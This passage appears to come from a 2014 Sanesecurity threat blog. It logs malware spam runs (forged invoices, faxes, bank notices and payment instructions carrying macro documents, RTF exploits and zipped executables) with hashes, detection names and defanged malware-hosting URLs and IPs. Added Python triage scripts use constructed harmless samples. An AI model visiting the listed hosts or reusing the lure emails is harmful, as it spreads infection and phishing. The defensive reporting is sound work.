h t t p : / / [remove]38 DOT 96 DOT 175 DOT 139:8080/stat/stati.php
 
 
Cheers,
 
Steve
Sanesecurity.com 
 

document malware: UAE EXCHANGE PAYMENT INSTRUCTION

This one has just landed...

Subject: UAE EXCHANGE 32,000USD PAYMENT INSTRUCTION
To: finance@uaeexchange.com
From: "finance@uaeexchange.com"
Date: Wed, 17 Dec 2014 08:43:13 +0000
Reply-To: 123@GMAIL.COM

Hello,

Please find attached payment instruction below and fill in the details as your client has requested from us to send you the payment before Friday 19th Dec 2014.
Fill in and resend the attached payment instruction to our email below so we can proceed with the payment immediately once we receive your response.
Your earlier reply is appreciated to avoid delay in payment process and avoid delay in our customer goods shipment.
If you have any questions you can call our numbers detailed or email to us with any assiatance needed.

Thank you
Best Regards
Sohel A Gani
Dubai International City
Shop No. 1, CBD 29, Al Warsan First, International City, Dubai
Phone: +971-4-4312691
Fax: +971-4-4310931
Email: Finance@uae-exchange.com
Business Hours: Sat - Thu: 8:00 A.M. - 10:00 P.M., Fri: 8.00 A.M. – 11.30 A.M, 1.30 P.M. – 10.00 P.M.

The email contains two attachments: a Word document (.doc) and a Microsoft Office Open XML format .ppsx document:

UAE EXCHANGE 32,000USD PAYMENT INSTRUCTION.doc (VirusTotal)
[Exploit.RTF.CVE-2012-015]

UAE EXCHANGE 32,000USD PAYMENT  INSTRUCTION.ppsx (VirusTotal)
[Exploit.CVE-2014-6352]

Cheers,

Steve
Sanesecurity.com

word document macro based malware: UK GEOLOGY PROJECT by "Rough & Tumble" with "Moussa Minerals"

Another malware run, this time with the malware embedded in an attached Word document :(

Date: Wed, 17 Dec 2014 16:20:09 +0800
From: "UK GEOLOGY PROJECT by \"Rough & Tumble\" with \"Moussa Minerals\""
Subject: Invoice as requested

No body of text this time, just an attachment...

20140918_122519.doc



Two variants so far. VirusTotal reports:

e832f74d424084e79505730f3b1faabc (1/54)
ff0694cba3b1ba6b39c997528385e649 (1/53)

Zero-hour detected by:

Sanesecurity.Malware.24646.DocHeur.UNOFFICIAL (phish.ndb)
Sanesecurity.Rogue.0hr.20141217-0828.UNOFFICIAL (rogue.hdb)

Embedded Macro: pastebin

Malwr report: here

Tuesday, 16 December 2014

cab file malware: Banking account Notification

A huge amount of fake banking malware is hitting here... this time using .CAB (Microsoft Cabinet) archives,
each containing a .SCR file:


Date: Tue, 16 Dec 2014 14:07:03 +0100
From: "Barbar Wheelus"
To: itsupport@newburydata.co.uk
Subject: Notice #J-19584HA-60644

===========================================
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
===========================================

Notification Number: 5317568
Mandate Number: 1601102
Date: December 16, 2014. 01:42pm

In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file "J-19584HA-60644.cab" for details.

Regards,
Barbar Wheelus
+07805 544772


There seem to be quite a few variants at the moment...

One version scanned with VirusTotal shows it's Kryptik.CCQZ :(

These are being blocked by...

Sanesecurity.Malware.24664
Sanesecurity.Malware.24665.ExeHeur

Monday, 15 December 2014

doc macro malware: IFS Applications vitacress.co.uk

Looks like another document containing macro malware has begun to be spammed out...

Date: Mon, 15 Dec 2014 04:45:32 -0300
From: IFS Applications
Subject: DOC-file for report is ready

The DOC-file for report Payment Advice is ready and is attached in this mail.

Payment Advice_593016.doc

41c4dd8ed6597723155aae653ad6a1e8
627de756499c17062a994351cc6388bd

VirusTotal reports no anti-virus software picking it up :(

Sanesecurity ClamAV signatures are blocking this one though, using...

Sanesecurity.Malware.24646.DocHeur.UNOFFICIAL FOUND (phish.ndb)
Sanesecurity.Rogue.0hr.20141215-0816.UNOFFICIAL FOUND (rogue.hdb)

Current Malwr report here shows malware contacting host 74.125.28.139

Decoded macro here (Pastebin)

Cheers,

Steve
Sanesecurity.com

Thursday, 11 December 2014

Word or Excel macro security for Dridex

Most of the recent spam runs containing Word or Excel macro-based malware will download the Dridex malware onto your system if the attached Word/Excel document manages to execute the macro inside it.

Office has blocked macros by default for a while now; however, the attachment may try to trick you into enabling macros manually, so don't.

Dridex, if run, will keep an eye on online banking activity and, if it sees any, will grab as much information as possible from your system, for example by taking screengrabs and capturing the bank forms you are filling in.

Microsoft has a guide to macro security, which is well worth reading here.
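One way to check an incoming Word/Excel attachment for the macro and embedded-object payloads described above, as an added Python example (not Sanesecurity's signatures or code): it sniffs the container type, looks for a VBA project in OOXML and legacy OLE2 files, flags `\objdata` in RTF, and reports when the extension does not match the container (as with the RTF files named .doc in the posts below). The sample files are constructed inside the block; the OLE2 ones carry only a magic number and directory names, and the `_VBA_PROJECT` search is a heuristic, not a compound-file parser.

```python
"""Heuristic macro/embedded-object triage for Office-style attachments.
Added example, not Sanesecurity's code: it checks container signatures
only and does not parse or extract the VBA itself."""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls/.ppt
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML .docx/.xlsm/.ppsx
RTF_MAGIC = b"{\\rtf"

# OLE2 directory entries store stream/storage names as UTF-16LE, so a raw
# search for these encoded names is a cheap (heuristic) macro indicator.
OLE_MACRO_MARKERS = [s.encode("utf-16-le") for s in ("_VBA_PROJECT", "Macros")]
LEGACY_EXTS = {"doc", "xls", "ppt"}
OOXML_EXTS = {"docx", "docm", "xlsx", "xlsm", "pptx", "pptm", "ppsx"}


def container_kind(data):
    """Identify the container from its leading bytes."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    if data.startswith(RTF_MAGIC):
        return "rtf"
    return "unknown"


def ooxml_has_vba(data):
    """OOXML keeps macros in a vbaProject.bin part under word/, xl/ or ppt/."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage(filename, data):
    """Return a verdict dict for one attachment."""
    kind = container_kind(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons = []
    if kind == "ole2" and any(m in data for m in OLE_MACRO_MARKERS):
        reasons.append("OLE2 file carries a VBA project storage")
    if kind == "ooxml" and ooxml_has_vba(data):
        reasons.append("OOXML package contains vbaProject.bin")
    if kind == "rtf" and b"\\objdata" in data:
        reasons.append("RTF carries an embedded OLE object (\\objdata)")
    # Word opens an RTF or OOXML file named .doc without complaint, so the
    # extension alone says nothing about what the parser will actually see.
    if (ext in LEGACY_EXTS and kind != "ole2") or (ext in OOXML_EXTS and kind != "ooxml"):
        reasons.append("extension .%s does not match %s container" % (ext, kind))
    return {"name": filename, "kind": kind, "suspicious": bool(reasons), "reasons": reasons}


# --- constructed samples (not real documents, not real malware) -----------

def _fake_ole2(names):
    """Stand-in for a compound file: real magic plus directory names encoded
    as OLE2 stores them. Not a valid document; enough to exercise the check."""
    return OLE2_MAGIC + b"\x00" * 504 + b"".join(n.encode("utf-16-le") + b"\x00\x00" for n in names)


def _fake_ooxml(parts):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


SAMPLES = {
    "invoice.doc": _fake_ole2(["Root Entry", "WordDocument", "Macros", "_VBA_PROJECT"]),
    "report.doc": _fake_ole2(["Root Entry", "WordDocument", "1Table"]),
    "remittance.xls": _fake_ooxml({"[Content_Types].xml": "<Types/>", "xl/workbook.xml": "<workbook/>",
                                   "xl/vbaProject.bin": b"\x00" * 32}),
    "clean.docx": _fake_ooxml({"[Content_Types].xml": "<Types/>", "word/document.xml": "<w:document/>"}),
    "account_docs.doc": b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata 0105000002000000}}}",
}


def run_samples():
    return {name: triage(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for verdict in run_samples().values():
        print(verdict["name"], verdict["kind"], verdict["reasons"] or "clean")
```

A hit from `triage` is a reason to quarantine for a closer look, not a conviction: signed macros in a `.xlsm` from a known sender trip the same check, and the OLE2 search can miss a project whose directory sectors it does not recognise.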

doc malware: Important Docs rbs

Another RTF (Rich Text Format) Word-based malware run, similar to today's earlier exploit...

Date: Thu, 11 Dec 2014 12:37:07 +0000
From: "Shelton Aaron"
Subject: Important Docs

Please review attached documents regarding your account.

Tel:  01322 609167
Fax: 01322 395148
email: Shelton@rbs.co.uk

This information is classified as Confidential unless otherwise stated.


The attached RTF (Rich Text Format) document RBS_Account_Documents.doc is detected as:

Sanesecurity.Rogue.0hr.20141211-1259

Cheers,

Steve
Sanesecurity.com

Employee Documents - Internal Use malware


From: "eBay.com"
Subject: Employee Documents - Internal Use
Message-ID: <02445414490536603757052027200341@ebay.com>

DOCUMENT NOTIFICATION, Powered by NetDocuments

DOCUMENT NAME: Employee Documents

DOCUMENT LINK: http://matoa-indonesia DOT com/do/document.php

Documents are encrypted in transit and store in a secure repository

---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential.
If you received this transmission in error, please notify the sender by reply email
and delete the message and any attachments.


The above is already blocked with Sanesecurity.Malware.24222.UNOFFICIAL

However, if you do click the link, it auto-downloads (via your browser) document8721_pdf.zip

The zip file contains document8721_pdf.exe and VirusTotal is currently reporting [3/56] hits

word document malware: INCOMING FAX REPORT

New Word attachment, a Rich Text Format document built to download malware.

This time, it's an incoming fax...

Date: Thu, 11 Dec 2014 03:17:44 -0800
From: "Incoming Fax"
Subject: INCOMING FAX REPORT : Remote ID: 794-474-7335

*********************************************************
INCOMING FAX REPORT
*********************************************************

Date/Time: Thu, 11 Dec 2014 03:17:44 -0800
Speed: 4924bps
Connection time: 00:06
Pages: 9
Resolution: Normal
Remote ID: 372-573-3700
Line number: 8
DTMF/DID:
Description: Internal Docs

Fax message attached in DOC format (Microsoft Word).

********************************************************* 


FaxMessage47412-872321.doc

One version at the moment... hash: 56b2227ce5ce8e82eb93e70191a5efaf

VirusTotal reports [1/56] virus scanners are hitting on the hash.

Sanesecurity.Rogue.0hr.20141211-1227 is currently blocking this one

word doc macro malware: UK Fuels E-bill

Another day and another Word doc "invoice" containing a macro, which if run will start downloading
malware from various servers around the globe.

The current run format is from a forged "UK Fuels" template:

From: invoices@ebillinvoice.com
To: user@xxxxxxxxxx.co.uk
Subject: UK Fuels E-bill

Customer No :        35056
Email address :         user@xxxxxxxxxx.co.uk
Attached file name :    35056_49_2014.doc


Dear Customer

Please find attached your invoice for Week 49 2014.

In order to open the attached DOC file you will need
the software Microsoft Office Word.

If you have any queries regarding your e-bill you can contact us at invoices@ebillinvoice.com.
Yours sincerely

Customer Services
UK Fuels Ltd

The 35056_49_2014.doc seems to have two variants at the moment, currently detected [0/56] at VirusTotal:


Hashes:

522ec80ccddfdff0095939798d4b1a18
9e009cf97565e47506195bc05f2c3f03


Currently zero-hour detected as: Sanesecurity.Malware.24631.XlsHeur.UNOFFICIAL

Cheers,

Steve
sanesecurity.com

Wednesday, 10 December 2014

Fake ACH Bank account information form

Busy malware day today... another new one just arriving...

From: "Josiah Nickerson"
Subject: ACH - Bank account information form

Please fill out and return the attached ACH form along with a copy of a voided check.

Josiah Nickerson,

JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Josiah.Nickerson@jpmchase.com
GRE Project Accounting


Email comes with a Check_Copy_Void.zip attachment (hash: 501f2cc2cf1e7f5c7bdc795070f33321)
which contains a Check_Copy_Void.scr malware

VirusTotal Report [7/56]

You have received a new fax malware (zip)

Another malware fax run, which says it's a pdf file but really it's a zip file containing an exe attachment:

From: "INTERNAL FAX"
Subject: You have received a new fax

You have received fax from EPSON06789041 at newxxxxxxxx.co.uk

Scan date: Wed, 10 Dec 2014 13:14:17 -0700

Number of page(s): 10

Resolution: 400x400 DPI

Name: fax187498127.pdf

_________________________________
Attached file is scanned image in PDF format.



The attachment is: fax4189052.exe (hash: ef7331bc368ae1e5acddd637ab33a352)

VirusTotal result so far...[4/56]

new photo malware

Received some emails saying that I've got to look at a new photo...


hi my new photo :) if u like my photo send me u




.... lovely.... except... it contains a zip attachment... my_photo.zip

Inside the zip file is a poor attempt at filename hiding...

my_photo_home_38472398472398749283.exe

Here's the current scanner situation..

VirusTotal Results 17/56 (df0620c00068fc83a539d95fda4bbb7f)
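The archive-wrapped payloads in the posts above (a .CAB holding a .SCR, a ".pdf" that is really a zip, a zip containing `document8721_pdf.exe`, an .exe hidden behind a long random name) can be triaged with the same small check. Here is an added Python example, not Sanesecurity's code: it sniffs the real container type, compares it with the claimed extension, lists archive members (walking the MS-CAB CFHEADER/CFFILE layout for cabinets, since the standard library cannot open them) and flags executable members and decoy double extensions. The archives and the `MZ` stub are constructed in the block and carry no real payload; the cabinet member name `Notice.scr` is invented, as the post does not give it.

```python
"""Triage for archive-wrapped executable attachments. Added example, not
Sanesecurity's code; it lists members and flags them, it never runs them."""
import io
import os
import struct
import zipfile

EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf", "hta", "jar"}
DECOY_WORDS = ("pdf", "doc", "xls", "jpg", "txt")  # decoy double extensions like name_pdf.exe
MAGICS = [(b"PK\x03\x04", "zip"), (b"MSCF", "cab"), (b"MZ", "pe"), (b"%PDF-", "pdf")]
EXPECTED_KIND = {"zip": "zip", "cab": "cab", "pdf": "pdf", "exe": "pe", "scr": "pe"}


def sniff(data):
    """Container type from the leading bytes, independent of the file name."""
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return kind
    return "unknown"


def ext_of(name):
    return os.path.splitext(name)[1].lower().lstrip(".")


def list_cab(data):
    """Member names of a cabinet, read from the CFFILE entries. CFHEADER keeps
    the offset of the first CFFILE at 0x10 and the file count at 0x1C; each
    CFFILE is 16 fixed bytes followed by a NUL-terminated name."""
    (coff_files,) = struct.unpack_from("<I", data, 0x10)
    (n_files,) = struct.unpack_from("<H", data, 0x1C)
    names, pos = [], coff_files
    for _ in range(n_files):
        pos += 16
        end = data.index(b"\x00", pos)
        names.append(data[pos:end].decode("utf-8", "replace"))
        pos = end + 1
    return names


def list_zip(data):
    """(name, first two bytes) per zip member, so a renamed PE still shows as MZ."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(i.filename, zf.read(i.filename)[:2]) for i in zf.infolist() if not i.is_dir()]


def inspect_attachment(name, data):
    kind, ext, findings, members = sniff(data), ext_of(name), [], []
    if ext in EXPECTED_KIND and EXPECTED_KIND[ext] != kind:
        findings.append("claims .%s but content is %s" % (ext, kind))
    if kind == "pe":
        findings.append("attachment is a Windows executable")
    if kind == "zip":
        entries = list_zip(data)
    elif kind == "cab":
        entries = [(n, b"") for n in list_cab(data)]
    else:
        entries = []
    for mname, head in entries:
        members.append(mname)
        if ext_of(mname) in EXEC_EXTS or head == b"MZ":
            findings.append("archive member %r is executable" % mname)
        stem = os.path.splitext(mname)[0].lower()
        if any(stem.endswith(sep + w) for w in DECOY_WORDS for sep in ("_", ".", "-")):
            findings.append("archive member %r uses a decoy double extension" % mname)
    return {"name": name, "kind": kind, "members": members, "findings": findings, "block": bool(findings)}


# --- constructed samples: empty archives with a harmless MZ stub --------------

def _zip(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for mname, body in members.items():
            zf.writestr(mname, body)
    return buf.getvalue()


def _cab(member_names):
    """Minimal MS-CAB layout: CFHEADER, one CFFOLDER, one CFFILE per name, no data blocks."""
    folder = struct.pack("<IHH", 0, 0, 0)  # coffCabStart, cCFData, typeCompress
    files = b"".join(struct.pack("<IIHHHH", 100, 0, 0, 0, 0, 0x20) + n.encode() + b"\x00"
                     for n in member_names)
    header = b"MSCF" + struct.pack("<IIIIIBBHHHHH", 0, 36 + len(folder) + len(files), 0,
                                   36 + len(folder), 0, 3, 1, 1, len(member_names), 0, 0, 0)
    return header + folder + files


MZ_STUB = b"MZ" + b"\x90" * 62  # constructed DOS-header stub, not a real program

SAMPLES = {
    "J-19584HA-60644.cab": _cab(["Notice.scr"]),
    "document8721_pdf.zip": _zip({"document8721_pdf.exe": MZ_STUB}),
    "fax187498127.pdf": _zip({"fax4189052.exe": MZ_STUB}),
    "my_photo.zip": _zip({"my_photo_home_38472398472398749283.exe": MZ_STUB}),
    "report.pdf": b"%PDF-1.4\n%%EOF\n",
}


def run_samples():
    return {name: inspect_attachment(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for v in run_samples().values():
        print(v["name"], v["kind"], v["members"], v["findings"] or "clean")
```

The cabinet walker only reads names, which is all a mail gateway needs to decide whether to hold the message; actual extraction of a `.cab` belongs in a sandbox, not in the filter.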


Voice redirected message malware

Received a few of these today....

Date: Wed, 10 Dec 2014 13:49:50 +0000
From: "Message Admin" dropibox.com
To: enquiries@xxxxxxxxxx.co.uk
Subject: Voice Message
Message-ID: <0298040680@dropibox.com>
X-Sender: admin@dropibox.com
User-Agent: Roundcube Webmail/1.0.1

Voice redirected message
http://offroadshop DOT sk/dropbox/invoice1
Sent: Wed, 10 Dec 2014 13:49:50 +0000

Note the extra letter i in the Dropbox name: dropibox.com

Needless to say, the clickable link delivers malware.
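The dropibox.com trick above, like the Reply-To: 123@GMAIL.COM on the UAE Exchange message earlier on this page, can be caught mechanically. Here is an added Python example, not Sanesecurity's code, that measures the edit distance of each sender-related header domain against a brand list and reports a Reply-To domain that differs from From. The brand list and the two sample header sets are constructed; the `admin@` local part on the sample From line is taken from the post's X-Sender header, since the From address itself did not survive extraction.

```python
"""Sender-domain checks for lookalike and mismatched headers. Added example,
not Sanesecurity's code; the brand list and the sample headers are constructed."""
import email
import email.utils

# Domains worth protecting against one-character lookalikes (constructed list).
BRANDS = ("dropbox.com", "ebay.com", "costco.com", "jpmchase.com", "rbs.co.uk")


def levenshtein(a, b):
    """Edit distance: single-character insertions, deletions or
    substitutions needed to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(domain, brands=BRANDS, max_distance=1):
    """Return the brand domain that `domain` imitates, or None. An exact
    match is the brand itself and is not reported."""
    domain = domain.lower()
    if domain in brands:
        return None
    for brand in brands:
        if levenshtein(domain, brand) <= max_distance:
            return brand
    return None


def sender_domains(raw_message):
    """Domain part of each sender-related header present in the message."""
    msg = email.message_from_string(raw_message)
    found = {}
    for header in ("From", "Reply-To", "X-Sender", "Return-Path"):
        value = msg.get(header)
        if value:
            address = email.utils.parseaddr(value)[1]
            if "@" in address:
                found[header] = address.rpartition("@")[2].lower()
    return found


def triage_headers(raw_message):
    domains = sender_domains(raw_message)
    findings = []
    for header, domain in domains.items():
        brand = lookalike(domain)
        if brand:
            findings.append("%s domain %s looks like %s" % (header, domain, brand))
    if "From" in domains and "Reply-To" in domains and domains["From"] != domains["Reply-To"]:
        findings.append("Reply-To domain %s differs from From domain %s"
                        % (domains["Reply-To"], domains["From"]))
    return findings


# Constructed sample headers modelled on the posts; recipient and local parts are invented.
VOICE_MESSAGE = """\
From: "Message Admin" <admin@dropibox.com>
To: enquiries@example.co.uk
Subject: Voice Message
X-Sender: admin@dropibox.com

Voice redirected message
"""

PAYMENT_INSTRUCTION = """\
From: "finance@uaeexchange.com" <finance@uaeexchange.com>
To: finance@uaeexchange.com
Reply-To: 123@GMAIL.COM
Subject: UAE EXCHANGE 32,000USD PAYMENT INSTRUCTION

Hello,
"""

if __name__ == "__main__":
    for sample in (VOICE_MESSAGE, PAYMENT_INSTRUCTION):
        print(triage_headers(sample) or ["no findings"])
```

A distance threshold of 1 catches single insertions such as the extra "i" here; raising it catches more typosquats but starts to match short legitimate domains against each other, so keep the brand list short and the threshold tied to domain length if you extend this.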

XLS Macro malware: K J Watking & Co

Another run of the faked K J Watking & Co email, containing an XLS spreadsheet (example name: BAC439622TB.xls) with macro-based malware inside it...


Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Heath David
Senior Accounts Payable Specialist
K J Watking & Co
Tel: 01469 432377

Interestingly, they've used the same malware XLS as in the earlier post today and just renamed it...

e.g.

This malware run: BAC998947HJ.xls (hash: 061930c8fc246872dda3af5670d3ea44)
Earlier malware run: ID_00477M.xls (hash: 061930c8fc246872dda3af5670d3ea44)

All variants were zero-hour detected by:

Sanesecurity.Malware.24631.XlsHeur (phish.ndb)
and additionally Sanesecurity.Rogue.0hr.20141210-1026 (rogue.hdb)

Update:

Since the macro malware downloads an exe, it's interesting to see how many times
the malware exe file has actually succeeded in being downloaded:

73,655 -- http://217 DOT 174 DOT 240 DOT 46 :8080/stat/stati.php
73,672 -- http://187 DOT 33 DOT 2 DOT 211 :8080/stat/stati.php

That's a few infected PCs there :(

Cheers,
Steve
Sanesecurity